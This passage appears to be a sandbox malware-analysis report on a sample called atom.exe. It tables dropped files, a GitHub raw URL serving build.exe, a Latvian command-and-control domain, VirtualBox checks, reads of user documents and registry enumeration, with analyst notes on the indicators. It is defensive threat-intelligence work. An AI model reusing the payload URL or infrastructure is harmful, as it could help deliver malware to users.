0b73ec50b09ea9929e0db0a60135e211b8f80c424a151706531cb9876617d1fe | C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe, C:\Users\kEecfMwgj\AppData\Local\Temp\build.exe | Dropped File | 6850.50 KB | application/vnd.microsoft.portable-executable | Create, Write, Access | SUSPICIOUS

Filename (File Name | Category | Operations | Verdict)

C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe | Dropped File | Create, Write, Access | SUSPICIOUS
(file name blank in the report) | Accessed File | Access | CLEAN
C:\Users\kEecfMwgj\Desktop\atom.exe | Sample File | Access | CLEAN
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | Accessed File | Access, Read | CLEAN
C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config | Accessed File | Access | CLEAN
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe.Config | Accessed File | Access, Read | CLEAN
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Accessed File | Access | CLEAN
C:\Users\kEecfMwgj\AppData\Local\Yandex\YaAddon | Accessed File | Create, Access | CLEAN
C:\Users\kEecfMwgj\AppData\Local\Yandex | Accessed File | Create, Access | CLEAN
C:\Users\kEecfMwgj\AppData\Local | Accessed File | Access | CLEAN
C:\Program Files (x86)\Internet Explorer\iexplore.exe | Accessed File | Access | CLEAN
C:\Users\kEecfMwgj\Desktop\LIL1t5-MkUPP65uzE1.docx | Accessed File | Access, Read | CLEAN
C:\Users\kEecfMwgj\Desktop\mbkBMQJcCOYi9J.docx | Accessed File | Access, Read | CLEAN
C:\Users\kEecfMwgj\Documents\0tbKWFp6.docx | Accessed File | Access, Read | CLEAN
C:\Users\kEecfMwgj\Documents\8ySAiRvWX.docx | Accessed File | Access, Read | CLEAN
C:\Users\kEecfMwgj\Documents\a2jfMMQ.docx | Accessed File | Access, Read | CLEAN
C:\Users\kEecfMwgj\Documents\mNHHimg7n4rPqQp.docx | Accessed File | Access, Read | CLEAN
C:\Users\kEecfMwgj\Documents\P3qvq.docx | Accessed File | Access, Read | CLEAN
C:\Users\kEecfMwgj\AppData\Local\Temp\build.exe | Dropped File | Create, Write, Access | CLEAN
\??\C:\Users\kEecfMwgj\AppData\Local\Temp\build.exe | Accessed File | Access | CLEAN
System Paging File | Accessed File | Access | CLEAN
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\config\machine.config | Accessed File | Access | CLEAN
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Accessed File | Access | CLEAN
C:\Windows\system32 | Accessed File | Access | CLEAN
C:\Windows | Accessed File | Access | CLEAN
C:\Windows\System32\Wbem | Accessed File | Access | CLEAN
C:\Windows\System32\WindowsPowerShell\v1.0\ | Accessed File | Access | CLEAN
C:\Users\kEecfMwgj\Documents\WindowsPowerShell\Modules | Accessed File | Access | CLEAN
C:\Program Files\WindowsPowerShell\Modules | Accessed File | Access | CLEAN
C:\Program Files\WindowsPowerShell\Modules\Modules.psd1, Modules.psm1, Modules.cdxml, Modules.xaml, Modules.ni.dll, Modules.dll | Accessed File | Access | CLEAN
C:\Program Files\WindowsPowerShell\Modules\PackageManagement | Accessed File | Access | CLEAN
C:\Program Files\WindowsPowerShell\Modules\PowerShellGet | Accessed File | Access | CLEAN
C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 | Accessed File | Access | CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | Accessed File | Access, Read | CLEAN
C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1, PackageManagement.psm1, PackageManagement.cdxml, PackageManagement.xaml, PackageManagement.ni.dll, PackageManagement.dll | Accessed File | Access | CLEAN
C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 | Accessed File | Access | CLEAN
C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psd1, PowerShellGet.psm1 | Accessed File | Access | CLEAN
C:\Program (entry cut off at a page break in the report)
C:\Windows\system32\WindowsPowerShell\v1.0\Modules | Accessed File | Access | CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.psd1, Modules.psm1, Modules.cdxml, Modules.xaml, Modules.ni.dll, Modules.dll | Accessed File | Access | CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppLocker, BitsTransfer, CimCmdlets, ISE, Microsoft.PowerShell.Archive, Microsoft.PowerShell.Diagnostics, Microsoft.PowerShell.Host, Microsoft.PowerShell.LocalAccounts, Microsoft.PowerShell.Management, Microsoft.PowerShell.ODataUtils, Microsoft.PowerShell.Security, Microsoft.PowerShell.Utility, Microsoft.WSMan.Management, NetworkSwitchManager, PSDesiredStateConfiguration, PSDiagnostics, PSScheduledJob, PSWorkflow, PSWorkflowUtility, TroubleshootingPack (module directories) | Accessed File | Access | CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 | Accessed File | Access | CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 | Accessed File | Access | CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppLocker\AppLocker.psd1 | Accessed File | Access | CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1 | Accessed File | Access | CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\CimCmdlets\CimCmdlets.psd1 | Accessed File | Access | CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1 | Accessed File | Access | CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psd1 | Accessed File | Access | CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1 | Accessed File | Access | CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Host\Microsoft.PowerShell.Host.psd1 | Accessed File | Access | CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.psd1 | Accessed File | Access | CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\Microsoft.PowerShell.LocalAccounts.psd1, .psm1, .cdxml, .xaml, .ni.dll, .dll | Accessed File | Access | CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager\NetworkSwitchManager.psd1 | Accessed File | Access | CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\PSDesiredStateConfiguration.psd1 | Accessed File | Access | CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDiagnostics\PSDiagnostics.psd1 | Accessed File | Access | CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSScheduledJob\PSScheduledJob.psd1 | Accessed File | Access | CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflow\PSWorkflow.psd1 | Accessed File | Access | CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\PSWorkflowUtility.psd1 | Accessed File | Access | CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\TroubleshootingPack\TroubleshootingPack.psd1 | Accessed File | Access | CLEAN
C:\windows\system32\windowspowershell\v1.0\Modules | Accessed File | Access | CLEAN
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config | Accessed File | Access, Read | CLEAN
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.config | Accessed File | Access | CLEAN
C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1 | Accessed File | Access | CLEAN
C:\Windows\system32\schtasks.exe | Accessed File | Access | CLEAN
C:\Users\kEecfMwgj\AppData\Roaming\Microsoft | Accessed File | Access | CLEAN
\??\C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe | Accessed File | Access | CLEAN

(The long run of WindowsPowerShell\Modules entries is the PowerShell host probing its module paths when processes #8 and #10 start; it is not behaviour of the sample. The .docx reads from the Desktop and Documents folders, by contrast, are the injected payload inventorying user documents.)

URL (URL | Category | IP Address | Country | HTTP Methods | Verdict)

https://github.com/gay225/hui/raw/main/build.exe | - | 140.82.121.4 | - | GET | CLEAN
https://raw.githubusercontent.com/gay225/hui/main/build.exe | - | 185.199.110.133 | - | GET | CLEAN
https://api.ip.sb/ip | - | 172.67.75.172 | - | GET | CLEAN

Domain (Domain | IP Address | Country | Protocols | Verdict)

vataeagene.xyz | 94.140.115.160 | - | DNS | CLEAN
api.ip.sb | 104.26.13.31, 104.26.12.31, 172.67.75.172 | - | HTTPS, DNS | CLEAN
api.ip.sb.cdn.cloudflare.net | 104.26.12.31, 104.26.13.31, 172.67.75.172 | - | DNS | CLEAN
github.com | 140.82.121.4 | - | HTTPS, DNS | CLEAN
raw.githubusercontent.com | 185.199.108.133, 185.199.109.133, 185.199.110.133, 185.199.111.133 | - | HTTPS, DNS | CLEAN

IP (IP Address | Domains | Country | Protocols | Verdict)

192.168.0.1 | - | - | UDP, DNS | CLEAN
140.82.121.4 | github.com | United States | TCP, HTTPS, DNS | CLEAN
185.199.110.133 | raw.githubusercontent.com | United States | TCP, HTTPS, DNS | CLEAN
94.140.115.160 | vataeagene.xyz | Latvia | TCP, DNS | CLEAN
172.67.75.172 | api.ip.sb.cdn.cloudflare.net, api.ip.sb | United States | TCP, HTTPS, DNS | CLEAN
104.26.13.31 | api.ip.sb.cdn.cloudflare.net, api.ip.sb | United States | DNS | CLEAN
104.26.12.31 | api.ip.sb.cdn.cloudflare.net, api.ip.sb | United States | DNS | CLEAN
185.199.111.133 | raw.githubusercontent.com | United States | DNS | CLEAN
185.199.108.133 | raw.githubusercontent.com | United States | DNS | CLEAN
185.199.109.133 | raw.githubusercontent.com | United States | DNS | CLEAN

Despite the CLEAN verdicts, the GitHub raw URL that delivered build.exe and the port-81 connection to vataeagene.xyz are the sample-specific indicators from this run; the GitHub and Cloudflare addresses are shared infrastructure and should not be blocked by IP. The entries marked DNS-only were returned by the resolver but never contacted.

Registry (Registry Key | Operations | Parent Process Name | Verdict)

HKEY_CURRENT_USER\Software\Borland\Locales access atom.exe CLEAN
HKEY_CURRENT_USER\Software\Borland\Delphi\Locales access atom.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System access atom.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA access, read atom.exe CLEAN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 access atom.exe CLEAN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc access, read atom.exe CLEAN
HKEY_LOCAL_MACHINE\Hardware\description\System access atom.exe CLEAN
HKEY_LOCAL_MACHINE\Hardware\description\System\SystemBiosVersion access, read atom.exe CLEAN
HKEY_LOCAL_MACHINE\Hardware\description\System\VideoBiosVersion access, read atom.exe CLEAN
HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ access atom.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext access build.exe, applaunch.exe CLEAN
HKEY_LOCAL_MACHINE access build.exe, applaunch.exe CLEAN
HKEY_CURRENT_USER\SOFTWARE\Microsoft\.NETFramework\XML access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\XML access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\InstallationType access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseSafeSynchronousClose access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.UseStrictRfcInterimResponseHandling access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseStrictRfcInterimResponseHandling access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Uri.AllowDangerousUnicodeDecompositions access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\AllowDangerousUnicodeDecompositions access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Uri.UseStrictIPv6AddressParsing access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseStrictIPv6AddressParsing access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Uri.AllowAllUriEncodingExpansion access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\AllowAllUriEncodingExpansion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SchUseStrongCrypto access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.SchSendAuxRecord access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SchSendAuxRecord access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SystemDefaultTlsVersions access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.RequireCertificateEKUs access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\RequireCertificateEKUs access, read applaunch.exe CLEAN
HKEY_CURRENT_USER access applaunch.exe CLEAN
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\LegacyWPADSupport access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\TZI access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\MUI_Display access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\MUI_Std access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\MUI_Dlt access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\WMIDisableCOMSecurity access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Clients\StartMenuInternet access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Clients\StartMenuInternet\IEXPLORE.EXE access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0FA68574-690B-4B00-89AA-B28946231449} access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0FA68574-690B-4B00-89AA-B28946231449}\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0FA68574-690B-4B00-89AA-B28946231449}\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E} access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757 access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173 access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860 access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655 access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743 access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063 access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573 access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2} access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f} access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{65e650ff-30be-469d-b63a-418d71ea1765}\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{65e650ff-30be-469d-b63a-418d71ea1765}\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6913e92a-b64e-41c9-a5e6-cef39207fe89} access applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6913e92a-b64e-41c9-a5e6-cef39207fe89}\DisplayName access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6913e92a-b64e-41c9-a5e6-cef39207fe89}\DisplayVersion access, read applaunch.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2} access applaunch.exe CLEAN
